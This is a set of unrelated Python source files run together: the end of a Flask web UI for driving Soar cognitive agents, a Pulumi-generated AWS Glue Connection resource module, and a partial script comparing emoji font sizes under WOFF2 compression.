aria-labelledby="stack-tab">') doc.append('<ul id="stackContent" class="list-group">') doc.append('</ul>') doc.append('</div>') doc.append('<div class="tab-pane" id="state" role="tabpanel" aria-labelledby="state-tab">') doc.append('<ul id="stateContent" class="list-group">') doc.append('</ul>') doc.append('</div>') doc.append('<div class="tab-pane" id="source" role="tabpanel" aria-labelledby="source-tab">') doc.append('<form id="f2">') doc.append('<div class="form-group">') doc.append('<label for="sourceFile">Upload Agent file</label>') doc.append('<input type="file" class="form-control-file" id="sourceFile">') doc.append('</div>') doc.append('<input type="submit" class="btn btn-primary" id="go" value="Upload" />') doc.append('</form>') doc.append('</div>') ##### doc.append('</div>') ## doc.append('</div>') js.append('var refreshList = [') js.append('["stackContent", "p --stack"],') js.append('["stateContent", "p -d 2 <s>"],') js.append('];') js.append('function refresh() {') js.append('for (var i=0; i<refreshList.length; i++) {') js.append('var r = refreshList[i];') js.append('var x = $("#" + r[0]);') js.append('$.ajax({ url:"/do", type: "POST", dataType: "json", data:{ "cmd":r[1], "tag":i, "agent":"' + agent_name + '" }, success:function(data) { ') js.append('var r2 = refreshList[parseInt(data.tag)];') js.append('var x2 = $("#" + r2[0]);') js.append('x2.empty();') js.append('x2.append($("<li></li>", { "class":"list-group-item" }).append($("<code></code>").text(r2[1]), $("<pre></pre>").text(data.result)));') js.append('}});') js.append('}') js.append('}') js.append('$(document).ready (function() {') js.append('$("#clear").click(function(event) {') js.append('$("#things").empty();') 
js.append('});') js.append('$("#f1").submit(function(event) {') js.append('event.preventDefault();') js.append('var c = $("#cmd")[0].value;') js.append('if ($.trim(c).length > 0)') js.append('$.ajax({ url:"/do", type: "POST", dataType: "json", data:{ "cmd":c, "print":"Y", "agent":"' + agent_name + '" }, success:function(data) { ') js.append('$("#things").prepend($("<li></li>", { "class":"list-group-item" }).append($("<code></code>").text(c), $("<pre></pre>").text(data.print), $("<pre></pre>").text(data.result)));') js.append('refresh();') js.append('}});') js.append('$("#cmd")[0].value = "";') js.append('$("#cmd")[0].focus();') js.append('});') js.append('$("#f2").submit(function(event) {') js.append('event.preventDefault();') js.append('var file = $("#sourceFile")[0].files[0];') js.append('var reader = new FileReader();') js.append('reader.onload = function (event) {') js.append('$.ajax({ url:"/do", type: "POST", dataType: "json", data:{ "cmd":event.target.result, "print":"Y", "agent":"' + agent_name + '" }, success:function(data) { ') js.append('$("#things").prepend($("<li></li>", { "class":"list-group-item" }).append($("<code></code>").text("source " + $("#sourceFile")[0].files[0].name), $("<pre></pre>").text(data.print), $("<pre></pre>").text(data.result)));') js.append('$("#sourceFile")[0].value=null;') js.append('}});') js.append('};') js.append('reader.readAsText(file);') js.append('});') js.append('refresh();') js.append('});') _footer(doc, js) return _out(doc) @app.route("/do", methods=['POST']) def do(): global kernel global prints agent_name = request.form['agent'] agent = kernel.GetAgent(agent_name) ret = { "result":"", "print":"", "tag":"" } if _has_needed_post(["cmd"]): ret["result"] = agent.ExecuteCommandLine(request.form["cmd"]) if _has_needed_post(["print"]): ret["print"] = _out(prints[agent_name]) prints[agent_name].clear() if _has_needed_post(["tag"]): ret["tag"] = request.form["tag"] return json.dumps(ret) if __name__ == '__main__': app.run()
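# Hedged sketch (illustration only): driving the endpoints above from a client
# script. Assumes the server is running on Flask's default
# http://127.0.0.1:5000 with a working Soar kernel; the agent name and the
# command line are placeholders.
import requests

BASE = "http://127.0.0.1:5000"

created = requests.post(f"{BASE}/create", data={"name": "demo"}).json()
assert created["result"], "agent creation failed"

# Execute a command line against the agent; sending "print":"Y" also returns
# any output captured by the print-event callback registered at creation time.
out = requests.post(
    f"{BASE}/do",
    data={"agent": "demo", "cmd": "p --stack", "print": "Y"},
).json()
print(out["result"])
print(out["print"])

requests.post(f"{BASE}/remove", data={"name": "demo"})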
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***

import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *

__all__ = ['ConnectionArgs', 'Connection']

@pulumi.input_type
class ConnectionArgs:
    def __init__(__self__, *,
                 catalog_id: Optional[pulumi.Input[str]] = None,
                 connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 connection_type: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 physical_connection_requirements: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a Connection resource.
        :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection.
        :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JDBC`.
        :param pulumi.Input[str] description: Description of the connection.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection.
        :param pulumi.Input[str] name: The name of the connection.
        :param pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs'] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
""" if catalog_id is not None: pulumi.set(__self__, "catalog_id", catalog_id) if connection_properties is not None: pulumi.set(__self__, "connection_properties", connection_properties) if connection_type is not None: pulumi.set(__self__, "connection_type", connection_type) if description is not None: pulumi.set(__self__, "description", description) if match_criterias is not None: pulumi.set(__self__, "match_criterias", match_criterias) if name is not None: pulumi.set(__self__, "name", name) if physical_connection_requirements is not None: pulumi.set(__self__, "physical_connection_requirements", physical_connection_requirements) if tags is not None: pulumi.set(__self__, "tags", tags) if tags_all is not None: pulumi.set(__self__, "tags_all", tags_all) @property @pulumi.getter(name="catalogId") def catalog_id(self) -> Optional[pulumi.Input[str]]: """ The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. """ return pulumi.get(self, "catalog_id") @catalog_id.setter def catalog_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "catalog_id", value) @property @pulumi.getter(name="connectionProperties") def connection_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of key-value pairs used as parameters for this connection. """ return pulumi.get(self, "connection_properties") @connection_properties.setter def connection_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "connection_properties", value) @property @pulumi.getter(name="connectionType") def connection_type(self) -> Optional[pulumi.Input[str]]: """ The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. """ return pulumi.get(self, "connection_type") @connection_type.setter def connection_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "connection_type", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ Description of the connection. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="matchCriterias") def match_criterias(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ A list of criteria that can be used in selecting this connection. """ return pulumi.get(self, "match_criterias") @match_criterias.setter def match_criterias(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "match_criterias", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the connection. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="physicalConnectionRequirements") def physical_connection_requirements(self) -> Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]: """ A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. 
""" return pulumi.get(self, "physical_connection_requirements") @physical_connection_requirements.setter def physical_connection_requirements(self, value: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]): pulumi.set(self, "physical_connection_requirements", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tagsAll") def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ return pulumi.get(self, "tags_all") @tags_all.setter def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags_all", value) @pulumi.input_type class _ConnectionState: def __init__(__self__, *, arn: Optional[pulumi.Input[str]] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None): """ Input properties used for looking up and filtering Connection resources. :param pulumi.Input[str] arn: The ARN of the Glue Connection. :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection. :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. :param pulumi.Input[str] description: Description of the connection. :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection. :param pulumi.Input[str] name: The name of the connection. :param pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs'] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. 
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
        """
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if catalog_id is not None:
            pulumi.set(__self__, "catalog_id", catalog_id)
        if connection_properties is not None:
            pulumi.set(__self__, "connection_properties", connection_properties)
        if connection_type is not None:
            pulumi.set(__self__, "connection_type", connection_type)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if match_criterias is not None:
            pulumi.set(__self__, "match_criterias", match_criterias)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if physical_connection_requirements is not None:
            pulumi.set(__self__, "physical_connection_requirements", physical_connection_requirements)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if tags_all is not None:
            pulumi.set(__self__, "tags_all", tags_all)

    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        The ARN of the Glue Connection.
        """
        return pulumi.get(self, "arn")

    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)

    @property
    @pulumi.getter(name="catalogId")
    def catalog_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default.
        """
        return pulumi.get(self, "catalog_id")

    @catalog_id.setter
    def catalog_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "catalog_id", value)

    @property
    @pulumi.getter(name="connectionProperties")
    def connection_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A map of key-value pairs used as parameters for this connection.
        """
        return pulumi.get(self, "connection_properties")

    @connection_properties.setter
    def connection_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "connection_properties", value)

    @property
    @pulumi.getter(name="connectionType")
    def connection_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JDBC`.
        """
        return pulumi.get(self, "connection_type")

    @connection_type.setter
    def connection_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "connection_type", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Description of the connection.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="matchCriterias")
    def match_criterias(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of criteria that can be used in selecting this connection.
        """
        return pulumi.get(self, "match_criterias")

    @match_criterias.setter
    def match_criterias(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "match_criterias", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the connection.
""" return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="physicalConnectionRequirements") def physical_connection_requirements(self) -> Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]: """ A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. """ return pulumi.get(self, "physical_connection_requirements") @physical_connection_requirements.setter def physical_connection_requirements(self, value: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]): pulumi.set(self, "physical_connection_requirements", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tagsAll") def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ return pulumi.get(self, "tags_all") @tags_all.setter def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags_all", value) class Connection(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None): """ Provides a Glue Connection resource. ## Example Usage ### Non-VPC Connection ```python import pulumi import pulumi_aws as aws example = aws.glue.Connection("example", connection_properties={ "JDBC_CONNECTION_URL": "jdbc:mysql://example.com/exampledatabase", "PASSWORD": "examplepassword", "USERNAME": "exampleusername", }) ``` ### VPC Connection For more information, see the [AWS Documentation](https://docs.aws.amazon.com/glue/latest/dg/populate-add-connection.html#connection-JDBC-VPC). 
        ```python
        import pulumi
        import pulumi_aws as aws

        example = aws.glue.Connection("example",
            connection_properties={
                "JDBC_CONNECTION_URL": f"jdbc:mysql://{aws_rds_cluster['example']['endpoint']}/exampledatabase",
                "PASSWORD": "examplepassword",
                "USERNAME": "exampleusername",
            },
            physical_connection_requirements=aws.glue.ConnectionPhysicalConnectionRequirementsArgs(
                availability_zone=aws_subnet["example"]["availability_zone"],
                security_group_id_lists=[aws_security_group["example"]["id"]],
                subnet_id=aws_subnet["example"]["id"],
            ))
        ```

        ## Import

        Glue Connections can be imported using the `CATALOG-ID` (AWS account ID if not custom) and `NAME`, e.g.

        ```sh
         $ pulumi import aws:glue/connection:Connection MyConnection 123456789012:MyConnection
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection.
        :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JDBC`.
        :param pulumi.Input[str] description: Description of the connection.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection.
        :param pulumi.Input[str] name: The name of the connection.
        :param pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: Optional[ConnectionArgs] = None,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Glue Connection resource.

        ## Example Usage
        ### Non-VPC Connection

        ```python
        import pulumi
        import pulumi_aws as aws

        example = aws.glue.Connection("example", connection_properties={
            "JDBC_CONNECTION_URL": "jdbc:mysql://example.com/exampledatabase",
            "PASSWORD": "examplepassword",
            "USERNAME": "exampleusername",
        })
        ```
        ### VPC Connection

        For more information, see the [AWS Documentation](https://docs.aws.amazon.com/glue/latest/dg/populate-add-connection.html#connection-JDBC-VPC).

        ```python
        import pulumi
        import pulumi_aws as aws

        example = aws.glue.Connection("example",
            connection_properties={
                "JDBC_CONNECTION_URL": f"jdbc:mysql://{aws_rds_cluster['example']['endpoint']}/exampledatabase",
                "PASSWORD": "examplepassword",
                "USERNAME": "exampleusername",
            },
            physical_connection_requirements=aws.glue.ConnectionPhysicalConnectionRequirementsArgs(
                availability_zone=aws_subnet["example"]["availability_zone"],
                security_group_id_lists=[aws_security_group["example"]["id"]],
                subnet_id=aws_subnet["example"]["id"],
            ))
        ```

        ## Import

        Glue Connections can be imported using the `CATALOG-ID` (AWS account ID if not custom) and `NAME`, e.g.

        ```sh
         $ pulumi import aws:glue/connection:Connection MyConnection 123456789012:MyConnection
        ```

        :param str resource_name: The name of the resource.
        :param ConnectionArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(ConnectionArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 catalog_id: Optional[pulumi.Input[str]] = None,
                 connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 connection_type: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 physical_connection_requirements: Optional[pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ConnectionArgs.__new__(ConnectionArgs)

            __props__.__dict__["catalog_id"] = catalog_id
            __props__.__dict__["connection_properties"] = connection_properties
            __props__.__dict__["connection_type"] = connection_type
            __props__.__dict__["description"] = description
            __props__.__dict__["match_criterias"] = match_criterias
            __props__.__dict__["name"] = name
            __props__.__dict__["physical_connection_requirements"] = physical_connection_requirements
            __props__.__dict__["tags"] = tags
            __props__.__dict__["tags_all"] = tags_all
            __props__.__dict__["arn"] = None
        super(Connection, __self__).__init__(
            'aws:glue/connection:Connection',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            arn: Optional[pulumi.Input[str]] = None,
            catalog_id: Optional[pulumi.Input[str]] = None,
            connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            connection_type: Optional[pulumi.Input[str]] = None,
            description: Optional[pulumi.Input[str]] = None,
            match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            name: Optional[pulumi.Input[str]] = None,
            physical_connection_requirements: Optional[pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']]] = None,
            tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Connection':
        """
        Get an existing Connection resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] arn: The ARN of the Glue Connection.
        :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection.
        :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JDBC`.
        :param pulumi.Input[str] description: Description of the connection.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection.
        :param pulumi.Input[str] name: The name of the connection.
        :param pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _ConnectionState.__new__(_ConnectionState)

        __props__.__dict__["arn"] = arn
        __props__.__dict__["catalog_id"] = catalog_id
        __props__.__dict__["connection_properties"] = connection_properties
        __props__.__dict__["connection_type"] = connection_type
        __props__.__dict__["description"] = description
        __props__.__dict__["match_criterias"] = match_criterias
        __props__.__dict__["name"] = name
        __props__.__dict__["physical_connection_requirements"] = physical_connection_requirements
        __props__.__dict__["tags"] = tags
        __props__.__dict__["tags_all"] = tags_all
        return Connection(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def arn(self) -> pulumi.Output[str]:
        """
        The ARN of the Glue Connection.
        """
        return pulumi.get(self, "arn")

    @property
    @pulumi.getter(name="catalogId")
    def catalog_id(self) -> pulumi.Output[str]:
        """
        The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default.
        """
        return pulumi.get(self, "catalog_id")

    @property
    @pulumi.getter(name="connectionProperties")
    def connection_properties(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A map of key-value pairs used as parameters for this connection.
        """
        return pulumi.get(self, "connection_properties")

    @property
    @pulumi.getter(name="connectionType")
    def connection_type(self) -> pulumi.Output[Optional[str]]:
        """
        The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JDBC`.
        """
        return pulumi.get(self, "connection_type")

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        Description of the connection.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter(name="matchCriterias")
    def match_criterias(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A list of criteria that can be used in selecting this connection.
        """
        return pulumi.get(self, "match_criterias")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the connection.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="physicalConnectionRequirements")
    def physical_connection_requirements(self) -> pulumi.Output[Optional['outputs.ConnectionPhysicalConnectionRequirements']]:
        """
        A map of physical connection requirements, such as VPC and SecurityGroup. Defined below.
        """
        return pulumi.get(self, "physical_connection_requirements")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="tagsAll")
    def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
        """
        A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
        """
        return pulumi.get(self, "tags_all")
#!/usr/bin/env python3 from pathlib import Path import csv import fontTools.ttLib.woff2 import functools import io import itertools import logging import math import multiprocessing import sys import argparse FONT_BASE_NAMES = { "noto": "Noto Color Emoji", "noto_noflags": "Noto Color Emoji except flags", "noto_flags": "Noto Color Emoji only flags", #"noto_handwriting": "Noto Color single Handwriting emoji", "twemoji": "Twemoji", #"twemoji_smiley": "Twemoji single Smiley Emoji", #"samples": "Samples test font", } FORMAT_DICT = { "cff2_colr_1": "colr_1, cff2", "cff_colr_1": "colr_1, cff", "glyf_colr_1": "colr_1, glyf", "picosvg": "ot-svg, picosvg", "picosvgz": "ot-svg, picosvg, zipped", "untouchedsvg": "ot-svg, svg", "untouchedsvgz": "ot-svg, svg, zipped", } def file_sizes_for_file(file_name): p = Path(file_name) if not p.is_file(): return None compressed_file = io.BytesIO() fontTools.ttLib.woff2.compress(file_name, compressed_file) return { "sfnt_uncompressed": p.stat().st_size, "woff2": len(compressed_file.getvalue()), } def compare_sizes(name_format, noto_cbdt_path=None): (name, format) = name_format if format == "cbdt": # Use parent cbdt file pathname. assert noto_cbdt_path is not None return (name, format, file_sizes_for_file(noto_cbdt_path)) file_name = f"fonts/{name}-{format}.{'o' if 'cff' in format else 't'}tf" return (name, format, file_sizes_for_file(file_name)) if __name__ == "__main__": logging.basicConfig(stream=sys.stderr, level=logging.INFO) parser = argparse.ArgumentParser() parser.add_argument( "--noto-cbdt", help="Provide a path for Noto Color Emoji as bitmap font." ) parsed_args = parser.parse_args() noto_cbdt_path = None if parsed_args.noto_cbdt and Path(parsed_args.noto_cbdt).is_file(): noto_cbdt_path = parsed_args.noto_cbdt files = list(itertools.product(FONT_BASE_NAMES, FORMAT_DICT)) if noto_cbdt_path: files.insert(0, ("noto", "cbdt")) FORMAT_DICT["cbdt"] = "CBDT/CBLC bitmap" else: logging.getLogger().warning( "Not adding Noto Color Emoji bitmap info to result." ) partial_compare_sizes = functools.partial( compare_sizes, noto_cbdt_path=noto_cbdt_path ) with multiprocessing.Pool(math.floor(multiprocessing.cpu_count() * 0.75)) as p: size_results = p.map(partial_compare_sizes, files) csv_file = io.StringIO() field_names = ["font", "format", "uncompressed_sfnt_size", "woff2_size"] writer = csv.DictWriter(csv_file, field_names) 